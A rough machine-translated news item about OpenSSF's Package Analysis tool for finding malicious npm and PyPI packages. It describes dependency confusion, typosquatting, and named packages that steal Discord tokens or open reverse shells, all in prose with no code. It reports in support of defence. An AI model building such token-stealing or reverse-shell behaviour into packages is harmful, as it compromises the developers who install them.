OpenSSF Foundation (Open Source Security Foundation), formed by Linux Foundation and aimed at increasing open security, presented open project package analysis , a developmental system for analyzing the presence of harmful code in packages. The project code is written in GO and is distributed under the Apache 2.0 license. Preliminary scanning of the NPM and Pypi Rosterias using the proposed tools made it possible to identify more than 200 harmful packages that previously not seen.
The main part of the identified problem packages is manipulated by the intersection of names with internal non -public dependencies of the projects (the destruction of depenency confusion) or use the Typskvotenthic methods (the purpose of names similar to the names of popular libraries), and also cause scripts addressing external hosts during the installation process. According to the developers of Package Analysis, most of the identified problem packages were most likely created by security researchers involved in the programs for obtaining rewards for identifying vulnerabilities (BUG Bountie), since the data sent are limited to the name of the user and the system, and actions are clearly performed, without attempts to hide their behavior .
from packages with harmful activity noted :
- Pypi package DiscordCMD, which recorded the sending of atypical queries to raw.githubusercontent.com, discord API and IPINFO.IO. The specified package uploaded a backdor code from GitHub and installed it on the Discord Windows Client catalog, after which he launched the Discord tokens process in the file system and send them to the external Discord server controlled by the attacking.
- NPM package Colorsss, which also tried to send tokens to the external server from the account in Discord.
- NPM package @roku -web-core/ajax-during the installation process, he sent data on the system and launched a processor (Reverse Shell), receiving external connections and launching commands.
- Pypi package Secrevthree – launched Reverse Shell when importing a certain module.
- NPM package Random-Vouchercode-Generator-after importing the library, he sent a request to the external server, which returned the team and time to which it needs to be launched.
The work of Package Analysis is reduced to analysis in the source texts of the code packages for installing network connections, access to files and starting commands. Additionally, a change in the state of the packages is monitored to determine the addition of harmful inserts in one of the issues of the initially harmless software. To monitor the emergence of new packages in repositories and amending previously placed packages, the instrumentation is used package feds , unifying work with the NPM repository, pypi , Go, Rubygems, Packagist, Nuget and Crate.
Package Analysis includes three basic components that can be used both in conjunction and separately: